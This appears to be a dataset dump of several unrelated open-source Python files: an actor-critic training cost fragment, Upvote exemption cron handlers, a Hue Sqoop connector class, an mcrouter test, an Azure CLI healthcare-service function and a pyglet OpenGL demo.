use_L2 = tensor.lt(abs(critic_errors), 0.5)
critic_costs_per_char = (use_L2 * critic_errors ** 2 +
(1 - use_L2) * abs(critic_errors)) * prediction_mask
else:
raise ValueError()
critic_costs = critic_costs_per_char[self.critic_burnin_steps:].sum(axis=0)
if not self.freeze_critic:
total_costs += critic_costs
# Compute critic Monte-Carlo cost
critic_monte_carlo_costs = (
(((prediction_values - future_rewards) ** 2) * prediction_mask)
[self.critic_burnin_steps:].sum(axis=0))
# Value penalty
if self.value_penalty:
logger.debug("Use value penalty")
if self.value_penalty_type == 'L2':
value_deviations = (values - values.mean(axis=-1, keepdims=True)) ** 2
elif self.value_penalty_type == 'L1':
value_deviations = abs(values - values.mean(axis=-1, keepdims=True))
else:
raise ValueError("unknown value penalty type {}".format(self.value_penalty_type))
if not self.freeze_critic:
total_costs += (
self.value_penalty *
(value_deviations.sum(axis=-1) * prediction_mask)
[self.critic_burnin_steps:].sum(axis=0))
# Compute actor cost
if self.critic:
# The actor cost will be minimized, that's why values
# must be negated.
est_name = self.actor_grad_estimate
if est_name == 'all_actions':
disadvantages = disconnected_grad(
values.max(axis=-1)[:, :, None] - values)
actor_costs = ((probs * disadvantages).sum(axis=-1)
* prediction_mask)
actor_costs = actor_costs[self.critic_burnin_steps:]
elif est_name.startswith('1_action'):
# Here we do not provide a target for the first step for
# the reason we lack an estimate of the value of the initial state.
# This is how our critic works.
# Hopefully the network won't unlearn
# to produce a BOS first.
future_reward_estimate = (future_rewards
if est_name.endswith('unbiased')
else prediction_values)
weights = -disconnected_grad(
future_reward_estimate[1:] + rewards[:-1] - prediction_values[:-1])
actor_costs = ((prediction_logs[1:] * weights) * prediction_mask[1:])
actor_costs = actor_costs[self.critic_burnin_steps + 1:]
else:
raise ValueError
actor_costs = actor_costs.sum(axis=0)
actor_entropies = (probs * -logs).sum(axis=-1) * prediction_mask
actor_entropies = actor_entropies[self.critic_burnin_steps:].sum(axis=0)
old_actor_cross_entropies = (old_probs * -logs).sum(axis=-1) * prediction_mask
old_actor_cross_entropies = old_actor_cross_entropies[self.critic_burnin_steps:].sum(axis=0)
critic_policy = disconnected_grad(
self.softmax.apply(self.critic_policy_t * values, extra_ndim=1))
critic_cross_entropies = (
(critic_policy * -logs).sum(axis=-1)
* prediction_mask)
critic_cross_entropies = critic_cross_entropies[self.critic_burnin_steps:].sum(axis=0)
actor_costs_with_penalties = (
actor_costs
- self.entropy_reward_coof * actor_entropies
# But really, should it be minus here, below?
- self.cross_entropy_reward_coof * critic_cross_entropies
+ self.trpo_coef * old_actor_cross_entropies)
if not self.freeze_actor:
total_costs += actor_costs_with_penalties
else:
total_costs += disconnected_grad(actor_costs_with_penalties)
# Add auxiliary variables for intermediate steps of the computation
application_call.add_auxiliary_variable(
rewards, name='rewards')
application_call.add_auxiliary_variable(
value_biases, name='value_biases')
application_call.add_auxiliary_variable(
values.copy(), name='values')
application_call.add_auxiliary_variable(
outputs.copy(), name='outputs')
application_call.add_auxiliary_variable(
prediction_values, name='prediction_values')
application_call.add_auxiliary_variable(
prediction_outputs, name='prediction_outputs')
application_call.add_auxiliary_variable(
value_targets.copy(), name='value_targets')
application_call.add_auxiliary_variable(
probs.copy(), name='probs')
application_call.add_auxiliary_variable(
prediction_logs, name='prediction_log_probs')
# Compute some statistics for debugging
last_character_mask = prediction_mask - rolled_prediction_mask
last_character_costs = (critic_costs_per_char * last_character_mask).sum(axis=0)
mean2_output = (
((prediction_outputs ** 2) * prediction_mask).sum()
/ prediction_mask.sum()) ** 0.5
max_output = abs(prediction_outputs * prediction_mask).max()
expected_reward = (probs[0] * values[0]).sum(axis=-1)
application_call.add_auxiliary_variable(
last_character_costs, name='last_character_costs')
application_call.add_auxiliary_variable(
critic_costs.mean(), name='mean_critic_cost')
application_call.add_auxiliary_variable(
critic_monte_carlo_costs.mean(), name='mean_critic_monte_carlo_cost')
if self.critic:
application_call.add_auxiliary_variable(
actor_costs.mean(), name='mean_actor_cost')
application_call.add_auxiliary_variable(
actor_entropies.mean(), name='mean_actor_entropy')
application_call.add_auxiliary_variable(
expected_reward.mean(), name='mean_expected_reward')
application_call.add_auxiliary_variable(
mean2_output, name='mean2_output')
application_call.add_auxiliary_variable(
max_output, name='max_output')
return total_costs
|
upvote/gae/cron/exemption_upkeep.py | iwikmai/upvote | 453 | 12750962 | # Copyright 2017 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Cron jobs which perform various Exemption maintenance tasks."""
import datetime
import logging
import webapp2
from webapp2_extras import routes
from google.appengine.ext import deferred
from upvote.gae.datastore.models import exemption as exemption_models
from upvote.gae.datastore.models import utils as model_utils
from upvote.gae.lib.exemption import api as exemption_api
from upvote.gae.lib.exemption import notify
from upvote.gae.lib.exemption import monitoring
from upvote.gae.utils import env_utils
from upvote.gae.utils import group_utils
from upvote.gae.utils import handler_utils
from upvote.gae.utils import user_utils
from upvote.shared import constants
# Done for the sake of brevity.
EXEMPTION_STATE = constants.EXEMPTION_STATE
class ProcessExemptions(handler_utils.CronJobHandler):
"""Handler for processing exemptions."""
def get(self):
logging.info('Processing Exemptions...')
exm_query = exemption_models.Exemption.query(
exemption_models.Exemption.state == EXEMPTION_STATE.REQUESTED)
exm_count = 0
for exm in exm_query:
deferred.defer(
exemption_api.Process, exm.key,
_queue=constants.TASK_QUEUE.EXEMPTIONS)
exm_count += 1
monitoring.requested_exemptions.Set(exm_count)
logging.info('Deferred %d Exemption(s) for processing', exm_count)
def _NotifyExpirationsInRange(start_dt, end_dt):
"""Sends an email for all APPROVED Exemptions that expire in the given range.
Args:
start_dt: The starting datetime of the expiration window.
end_dt: The ending datetime of the expiration window.
"""
# Query for the Keys of all Exemptions that expire in the given range.
exm_query = exemption_models.Exemption.query(
exemption_models.Exemption.state == EXEMPTION_STATE.APPROVED,
exemption_models.Exemption.deactivation_dt >= start_dt,
exemption_models.Exemption.deactivation_dt < end_dt)
exm_keys = exm_query.fetch(keys_only=True)
for exm_key in exm_keys:
notify.SendExpirationEmail(exm_key)
class NotifyUpcomingExpirations(handler_utils.CronJobHandler):
"""Handler for notifying users of upcoming exemption expirations."""
def get(self):
now = datetime.datetime.utcnow()
# Notify all users whose Exemptions now have less than a week left, in order
# to give reasonable advance warning (e.g. long weekends, holidays, etc).
one_week_start_dt = now + datetime.timedelta(days=7, hours=-1)
one_week_end_dt = now + datetime.timedelta(days=7)
# Notify all users whose Exemptions now have less that 24 hours left. This
# will act as a final reminder, and will also ensure that even users who
# choose a 1-day Exemption will get an email warning (for what it's worth).
one_day_start_dt = now + datetime.timedelta(days=1, hours=-1)
one_day_end_dt = now + datetime.timedelta(days=1)
tuples = [
(one_week_start_dt, one_week_end_dt),
(one_day_start_dt, one_day_end_dt)]
# Defer a task for each batch of notifications.
for start_dt, end_dt in tuples:
deferred.defer(
_NotifyExpirationsInRange, start_dt, end_dt,
_queue=constants.TASK_QUEUE.EXEMPTIONS)
class ExpireExemptions(handler_utils.CronJobHandler):
"""Handler for expiring exemptions."""
def get(self):
logging.info('Expiring Exemptions...')
now = datetime.datetime.utcnow()
exm_query = exemption_models.Exemption.query(
exemption_models.Exemption.state == EXEMPTION_STATE.APPROVED,
exemption_models.Exemption.deactivation_dt <= now)
exm_count = 0
for exm in exm_query:
deferred.defer(
exemption_api.Expire, exm.key,
_queue=constants.TASK_QUEUE.EXEMPTIONS)
exm_count += 1
monitoring.expired_exemptions.Set(exm_count)
logging.info('Deferred %d Exemption(s) for expiration', exm_count)
ROUTES = routes.PathPrefixRoute('/exemptions', [
webapp2.Route('/process', handler=ProcessExemptions),
webapp2.Route(
'/notify-upcoming-expirations',
handler=NotifyUpcomingExpirations),
webapp2.Route('/expire', handler=ExpireExemptions),
])
|
apps/sqoop/src/sqoop/client/connector.py | yetsun/hue | 5,079 | 12750980 | <reponame>yetsun/hue<gh_stars>1000+
# Licensed to Cloudera, Inc. under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. Cloudera, Inc. licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import
from builtins import object
import logging
from desktop.lib.python_util import force_dict_to_strings
from sqoop.client.config import Config
class Connector(object):
def __init__(self, id, name, version, link_config, job_config, config_resources={}, **kwargs):
self.id = id
self.name = name
self.version = version
self.job_config = job_config
self.link_config = link_config
self.config_resources = config_resources
setattr(self, 'class', kwargs['class'])
@staticmethod
def from_dict(connector_dict):
connector_dict.setdefault('link_config', [])
connector_dict['link_config'] = [ Config.from_dict(link_config_dict) for link_config_dict in connector_dict['link-config'] ]
connector_dict.setdefault('job_config', {})
connector_dict['job_config'] = {}
if 'FROM' in connector_dict['job-config']:
connector_dict['job_config']['FROM'] = [ Config.from_dict(from_config_dict) for from_config_dict in connector_dict['job-config']['FROM'] ]
if 'TO' in connector_dict['job-config']:
connector_dict['job_config']['TO'] = [ Config.from_dict(to_config_dict) for to_config_dict in connector_dict['job-config']['TO'] ]
connector_dict['config_resources'] = connector_dict['all-config-resources']
return Connector(**force_dict_to_strings(connector_dict))
def to_dict(self):
d = {
'id': self.id,
'name': self.name,
'version': self.version,
'class': getattr(self, 'class'),
'link-config': [ link_config.to_dict() for link_config in self.link_config ],
'job-config': {},
'all-config-resources': self.config_resources
}
if 'FROM' in self.job_config:
d['job-config']['FROM'] = [ job_config.to_dict() for job_config in self.job_config['FROM'] ]
if 'TO' in self.job_config:
d['job-config']['TO'] = [ job_config.to_dict() for job_config in self.job_config['TO'] ]
return d
|
mcrouter/test/test_logical_routing_policies.py | kiaplayer/mcrouter | 2,205 | 12751009 | <gh_stars>1000+
#!/usr/bin/env python3
# Copyright (c) Facebook, Inc. and its affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
from mcrouter.test.MCProcess import *
from mcrouter.test.McrouterTestCase import McrouterTestCase
class TestLogicalRoutingPolicies(McrouterTestCase):
config = './mcrouter/test/test_logical_routing_policies.json'
extra_args = []
def setUp(self):
self.mc = self.add_server(Memcached())
def test_different_cluster(self):
mcrouter = self.add_mcrouter(self.config, '/region1/cluster2/',
extra_args=self.extra_args)
key = 'foo1'
value = 'value1'
mcrouter.set(key, value)
self.assertEqual(self.mc.get(key), value)
def test_different_region_cluster(self):
mcrouter = self.add_mcrouter(self.config, '/region2/cluster3/',
extra_args=self.extra_args)
key = 'foo2'
value = 'value2'
mcrouter.set(key, value)
self.assertEqual(self.mc.get(key), value)
|
src/healthcareapis/azext_healthcareapis/manual/custom.py | haroonf/azure-cli-extensions | 207 | 12751014 | # --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
# --------------------------------------------------------------------------
# pylint: disable=too-many-lines
from azure.cli.core.util import sdk_no_wait
def healthcareapis_service_show(client,
resource_group_name,
resource_name):
return client.get(resource_group_name=resource_group_name,
resource_name=resource_name)
# we use this as a create or update
def healthcareapis_service_create(client,
resource_group_name,
resource_name,
kind,
location,
tags=None,
etag=None,
identity_type=None,
access_policies=None,
cosmos_db_configuration=None,
authentication_configuration=None,
cors_configuration=None,
private_endpoint_connections=None,
public_network_access=None,
export_configuration_storage_account_name=None,
no_wait=False):
properties = {
'access_policies': access_policies,
'authentication_configuration': authentication_configuration,
'cors_configuration': cors_configuration,
'cosmos_db_configuration': cosmos_db_configuration,
'private_endpoint_connections': private_endpoint_connections,
'public_network_access': public_network_access
}
if export_configuration_storage_account_name is not None:
properties['export_configuration'] = {
'storage_account_name': export_configuration_storage_account_name
}
service_description = {
'name': resource_name,
'kind': kind,
'location': location,
'etag': etag,
'properties': properties,
'tags': tags
}
if identity_type is not None:
service_description['identity'] = {
'principal_id': None,
'tenant_id': None,
'type': identity_type,
}
else:
service_description['identity'] = {
'principal_id': None,
'tenant_id': None,
'type': "None",
}
return sdk_no_wait(no_wait,
client.create_or_update,
resource_group_name=resource_group_name,
resource_name=resource_name,
service_description=service_description)
|
examples/opengl/opengl_core.py | HenrYxZ/pyglet | 1,160 | 12751037 | import pyglet
from pyglet.gl import *
# pyglet.options['debug_gl_shaders'] = True
window = pyglet.window.Window(width=540, height=540, resizable=True)
batch = pyglet.graphics.Batch()
print("OpenGL Context: {}".format(window.context.get_info().version))
##########################################################
# TESTS !
##########################################################
label = pyglet.text.Label("This is a test", x=0, y=180, dpi=200, color=(255, 25, 255, 150), batch=batch)
vertex_list = pyglet.graphics.vertex_list(3, ('position3f', (100, 300, 0, 200, 250, 0, 200, 350, 0)),
('colors4f', (1, 0, 0, 1, 0, 1, 0, 1, 0.3, 0.3, 1, 1)))
def create_quad_vertex_list(x, y, z, width, height):
return x, y, z, x + width, y, z, x + width, y + height, z, x, y + height, z
batch.add_indexed(4, GL_TRIANGLES, None, [0, 1, 2, 0, 2, 3],
('position3f', create_quad_vertex_list(480, 270, -11, 50, 50)),
('colors4f', (1, 0.5, 0.2, 1, 1, 0.5, 0.2, 1, 1, 0.5, 0.2, 1, 1, 0.5, 0.2, 1)))
batch.add_indexed(4, GL_TRIANGLES, None, [0, 1, 2, 0, 2, 3],
('position3f', (400, 400, 0, 400+50, 400, 0, 400+50, 400+50, 0, 400, 400+50, 0)),
('colors4f', (1, 0.5, 0.2, 1, 1, 0.5, 0.2, 1, 1, 0.5, 0.2, 1, 1, 0.5, 0.2, 1)))
img = pyglet.image.load("pyglet.png")
img.anchor_x = img.width // 2
img.anchor_y = img.height // 2
red = pyglet.image.SolidColorImagePattern((255, 0, 0, 255)).create_image(50, 50)
green = pyglet.image.SolidColorImagePattern((0, 255, 0, 255)).create_image(50, 50)
blue = pyglet.image.SolidColorImagePattern((0, 0, 255, 255)).create_image(50, 50)
white = pyglet.image.SolidColorImagePattern((255, 255, 255, 255)).create_image(50, 50)
sprites = [pyglet.sprite.Sprite(img=img, x=60, y=80, batch=batch),
pyglet.sprite.Sprite(img=img, x=110, y=90, batch=batch),
pyglet.sprite.Sprite(img=img, x=160, y=100, batch=batch),
pyglet.sprite.Sprite(img=img, x=210, y=110, batch=batch)]
for sprite in sprites:
sprite.opacity = 220
sprite2 = pyglet.sprite.Sprite(img=red, x=200, y=400, batch=batch)
sprite3 = pyglet.sprite.Sprite(img=green, x=300, y=300, batch=batch)
sprite4 = pyglet.sprite.Sprite(img=blue, x=400, y=200, batch=batch)
sprite5 = pyglet.sprite.Sprite(img=white, x=500, y=100, batch=batch)
standalone_sprite = pyglet.sprite.Sprite(img=white, x=600, y=0)
##########################################################
# Modify the sprite scale value by scrolling the mouse
##########################################################
@window.event
def on_mouse_scroll(x, y, mouse, direction):
for spr in sprites:
spr.scale += direction / 10
###########################################################
#
###########################################################
@window.event
def on_draw():
window.clear()
# pyglet.graphics.draw(3, GL_TRIANGLES, ('position3f', (100, 100, 0, 200, 100, 0, 150, 200, 0)),
# ('colors3f', (1, 0.5, 0.2, 1, 0.5, 0.2, 1, 0.5, 0.2)))
#
# pyglet.graphics.draw_indexed(4, GL_TRIANGLES, [0, 1, 2, 0, 2, 3],
# ('position2i', (225, 300, 250, 300, 250, 325, 225, 325)),
# ('colors3f', (0.5, 1, 0.2, 0.5, 0.2, 1, 0.2, 0.5, 1, 1, 0.5, 0.2)))
vertex_list.draw(GL_TRIANGLES)
batch.draw()
standalone_sprite.draw()
def update(dt):
for sprite in sprites:
sprite.rotation += 100 * dt % 360
if __name__ == "__main__":
pyglet.gl.glClearColor(0.2, 0.3, 0.3, 1)
pyglet.clock.schedule_interval(update, 1/60)
pyglet.app.run()
|
Subsets and Splits
No saved queries yet
Save your SQL queries to embed, download, and access them later. Queries will appear here once saved.